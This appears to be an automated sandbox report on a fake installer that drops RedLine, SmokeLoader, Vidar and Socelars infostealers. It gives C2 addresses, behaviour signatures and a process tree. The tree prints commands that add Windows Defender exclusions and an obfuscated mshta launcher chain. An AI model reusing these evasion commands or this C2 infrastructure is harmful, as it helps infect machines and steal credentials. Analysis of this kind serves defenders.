Resubmissions

11-10-2021 20:45

211011-zjxjlsabbm 10

11-10-2021 13:10

211011-qegsxshcfp 10

11-10-2021 10:55

211011-mz7y3ahaak 10

10-10-2021 19:24

211010-x4mtssgae2 10

Analysis

  • max time kernel
    1809s
  • max time network
    1815s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    10-10-2021 19:24

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.9MB

  • MD5

    a4d23ac3c7172b9aa02e35b6bf0fd21f

  • SHA1

    0326aab7deddfefc048c9a67ac9ce4ee14ea9003

  • SHA256

    9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806

  • SHA512

    9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10

Malware Config

Extracted

Family

redline

Botnet

sad

C2

107.172.13.162:42751

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://fazanaharahe10.top/

http://xandelissane20.top/

http://ustiassosale30.top/

http://cytheriata40.top/

http://ggiergionard50.top/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 18 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 39 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 14 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 15 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 34 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4768
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS848924F3\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe
          4⤵
            PID:2264
            • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun152bab5a2de.exe
              Sun152bab5a2de.exe
              5⤵
              • Executes dropped EXE
              PID:2340
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1724
            • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15901f2f025e.exe
              Sun15901f2f025e.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2644
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1912
                6⤵
                • Program crash
                • Checks processor information in registry
                • Enumerates system info in registry
                PID:3940
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4940
            • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15dbd675f871ca.exe
              Sun15dbd675f871ca.exe
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:3668
              • C:\Users\Admin\Pictures\Adobe Films\Q_tbQAON4zee4WZgnXDMoQyQ.exe
                "C:\Users\Admin\Pictures\Adobe Films\Q_tbQAON4zee4WZgnXDMoQyQ.exe"
                6⤵
                • Executes dropped EXE
                PID:468
              • C:\Users\Admin\Pictures\Adobe Films\R08xH9BCP1lPnAzjfZi8v2li.exe
                "C:\Users\Admin\Pictures\Adobe Films\R08xH9BCP1lPnAzjfZi8v2li.exe"
                6⤵
                • Executes dropped EXE
                PID:1896
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 300
                  7⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:5220
              • C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe
                "C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:5576
                • C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe
                  "C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe"
                  7⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:5876
              • C:\Users\Admin\Pictures\Adobe Films\Q3x6p3_Ppyweai0cdzWrKdTO.exe
                "C:\Users\Admin\Pictures\Adobe Films\Q3x6p3_Ppyweai0cdzWrKdTO.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5432
              • C:\Users\Admin\Pictures\Adobe Films\6cMNaNz6xs8uOfpzArASoKEi.exe
                "C:\Users\Admin\Pictures\Adobe Films\6cMNaNz6xs8uOfpzArASoKEi.exe"
                6⤵
                • Executes dropped EXE
                PID:5480
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 276
                  7⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:6640
              • C:\Users\Admin\Pictures\Adobe Films\und2L3xwxwEHAWOOJXId1Mpg.exe
                "C:\Users\Admin\Pictures\Adobe Films\und2L3xwxwEHAWOOJXId1Mpg.exe"
                6⤵
                  PID:1000
                  • C:\ProgramData\build.exe
                    "C:\ProgramData\build.exe"
                    7⤵
                      PID:5292
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 2060
                        8⤵
                        • Program crash
                        PID:2828
                  • C:\Users\Admin\Pictures\Adobe Films\vybwnpLczODZizIBf8geRxV_.exe
                    "C:\Users\Admin\Pictures\Adobe Films\vybwnpLczODZizIBf8geRxV_.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2160
                    • C:\Users\Admin\AppData\Roaming\5327978.scr
                      "C:\Users\Admin\AppData\Roaming\5327978.scr" /S
                      7⤵
                        PID:5340
                      • C:\Users\Admin\AppData\Roaming\4385520.scr
                        "C:\Users\Admin\AppData\Roaming\4385520.scr" /S
                        7⤵
                        • Suspicious behavior: SetClipboardViewer
                        PID:6272
                      • C:\Users\Admin\AppData\Roaming\3392110.scr
                        "C:\Users\Admin\AppData\Roaming\3392110.scr" /S
                        7⤵
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:6928
                      • C:\Users\Admin\AppData\Roaming\3645252.scr
                        "C:\Users\Admin\AppData\Roaming\3645252.scr" /S
                        7⤵
                        • Windows security modification
                        • Checks whether UAC is enabled
                        • Suspicious use of SetThreadContext
                        • System policy modification
                        PID:7052
                        • C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\AdvancedRun.exe
                          "C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                          8⤵
                            PID:5796
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\3645252.scr" -Force
                            8⤵
                            • Blocklisted process makes network request
                            • Executes dropped EXE
                            PID:2988
                          • C:\Users\Admin\AppData\Roaming\3645252.scr
                            "C:\Users\Admin\AppData\Roaming\3645252.scr"
                            8⤵
                              PID:6868
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\3645252.scr" -Force
                              8⤵
                                PID:6788
                              • C:\Users\Admin\AppData\Roaming\3645252.scr
                                "C:\Users\Admin\AppData\Roaming\3645252.scr"
                                8⤵
                                  PID:6516
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7052 -s 2496
                                  8⤵
                                  • Program crash
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  PID:5608
                              • C:\Users\Admin\AppData\Roaming\2450279.scr
                                "C:\Users\Admin\AppData\Roaming\2450279.scr" /S
                                7⤵
                                  PID:6016
                              • C:\Users\Admin\Pictures\Adobe Films\VrhYZyTUFiHxx9ufigih5dzd.exe
                                "C:\Users\Admin\Pictures\Adobe Films\VrhYZyTUFiHxx9ufigih5dzd.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5232
                              • C:\Users\Admin\Pictures\Adobe Films\O4pPWuoP96KUANHjZGFW5DTt.exe
                                "C:\Users\Admin\Pictures\Adobe Films\O4pPWuoP96KUANHjZGFW5DTt.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:1876
                              • C:\Users\Admin\Pictures\Adobe Films\7UXcpESJJu1f6oCuDC4HeQI4.exe
                                "C:\Users\Admin\Pictures\Adobe Films\7UXcpESJJu1f6oCuDC4HeQI4.exe"
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                PID:3792
                                • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                  7⤵
                                    PID:6176
                                  • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                    "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                    7⤵
                                      PID:6168
                                    • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                      "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                      7⤵
                                        PID:6160
                                    • C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Windows security modification
                                      • Checks whether UAC is enabled
                                      • Suspicious use of SetThreadContext
                                      • System policy modification
                                      PID:2548
                                      • C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\AdvancedRun.exe
                                        "C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                        7⤵
                                          PID:1100
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\test.bat"
                                            8⤵
                                              PID:4256
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe" -Force
                                            7⤵
                                              PID:5508
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe" -Force
                                              7⤵
                                                PID:5996
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:2544
                                              • C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe"
                                                7⤵
                                                  PID:792
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 2596
                                                  7⤵
                                                  • Program crash
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:7152
                                              • C:\Users\Admin\Pictures\Adobe Films\SLvkfBa1xXavhXchZs1OMNTN.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\SLvkfBa1xXavhXchZs1OMNTN.exe"
                                                6⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Executes dropped EXE
                                                PID:1548
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 276
                                                  7⤵
                                                  • Program crash
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:7108
                                              • C:\Users\Admin\Pictures\Adobe Films\ziwapD8GNIFEgwzhGXQcvcaW.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\ziwapD8GNIFEgwzhGXQcvcaW.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4544
                                              • C:\Users\Admin\Pictures\Adobe Films\uF4BWdwhJtrCLd15_CKd5bGb.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\uF4BWdwhJtrCLd15_CKd5bGb.exe"
                                                6⤵
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5640
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:1000
                                              • C:\Users\Admin\Pictures\Adobe Films\VxMgZLfaPN2cCgNt7X4dGKQw.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\VxMgZLfaPN2cCgNt7X4dGKQw.exe"
                                                6⤵
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5468
                                              • C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe"
                                                6⤵
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of SetThreadContext
                                                PID:5712
                                                • C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe"
                                                  7⤵
                                                    PID:2556
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2020
                                                    7⤵
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:3500
                                                • C:\Users\Admin\Pictures\Adobe Films\TJ1IiWlmJ3sbL_hCLrYApLdL.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\TJ1IiWlmJ3sbL_hCLrYApLdL.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2620
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 268
                                                    7⤵
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:6712
                                                • C:\Users\Admin\Pictures\Adobe Films\pa82Er1J_F7R9hqG4Jsv9miU.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\pa82Er1J_F7R9hqG4Jsv9miU.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:1944
                                                • C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe"
                                                  6⤵
                                                    PID:4668
                                                    • C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe"
                                                      7⤵
                                                        PID:6424
                                                    • C:\Users\Admin\Pictures\Adobe Films\wPZfFfsDdr7wDZJc1QQ0TXDG.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\wPZfFfsDdr7wDZJc1QQ0TXDG.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5708
                                                    • C:\Users\Admin\Pictures\Adobe Films\0UGE9HR9MDxNDb5VGFOSQJzG.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\0UGE9HR9MDxNDb5VGFOSQJzG.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5892
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 300
                                                        7⤵
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:6804
                                                    • C:\Users\Admin\Pictures\Adobe Films\DEpiQfOAYIOV_W38iErqfG0p.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\DEpiQfOAYIOV_W38iErqfG0p.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:4044
                                                    • C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Windows security modification
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      PID:3416
                                                      • C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\AdvancedRun.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                        7⤵
                                                          PID:6936
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\test.bat"
                                                            8⤵
                                                              PID:6420
                                                          • C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5292
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe" -Force
                                                            7⤵
                                                              PID:2096
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4432
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15f67075f27a2b5b.exe
                                                          Sun15f67075f27a2b5b.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3192
                                                          • C:\Users\Admin\AppData\Roaming\2444570.scr
                                                            "C:\Users\Admin\AppData\Roaming\2444570.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2288
                                                          • C:\Users\Admin\AppData\Roaming\3840480.scr
                                                            "C:\Users\Admin\AppData\Roaming\3840480.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            PID:1268
                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6116
                                                          • C:\Users\Admin\AppData\Roaming\4791890.scr
                                                            "C:\Users\Admin\AppData\Roaming\4791890.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4140
                                                          • C:\Users\Admin\AppData\Roaming\8917834.scr
                                                            "C:\Users\Admin\AppData\Roaming\8917834.scr" /S
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:2256
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2924
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15f1b1f8c669.exe
                                                          Sun15f1b1f8c669.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:2216
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 320
                                                            6⤵
                                                            • Drops file in Windows directory
                                                            • Program crash
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3704
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4436
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun1577c3e159a3e3815.exe
                                                          Sun1577c3e159a3e3815.exe /mixone
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4136
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 284
                                                            6⤵
                                                            • Program crash
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            PID:1800
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2604
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
                                                          Sun159ff1acacf.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4912
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
                                                            C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
                                                            6⤵
                                                              PID:2256
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4088
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe
                                                          4⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2880
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun152bea652bd7232.exe
                                                            Sun152bea652bd7232.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:1996
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe
                                                          4⤵
                                                            PID:3712
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe
                                                              Sun158d8ef840.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:3316
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                6⤵
                                                                  PID:2052
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe" ) do taskkill /F -Im "%~NxU"
                                                                    7⤵
                                                                      PID:1556
                                                                      • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                        09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:476
                                                                        • C:\Windows\SysWOW64\mshta.exe
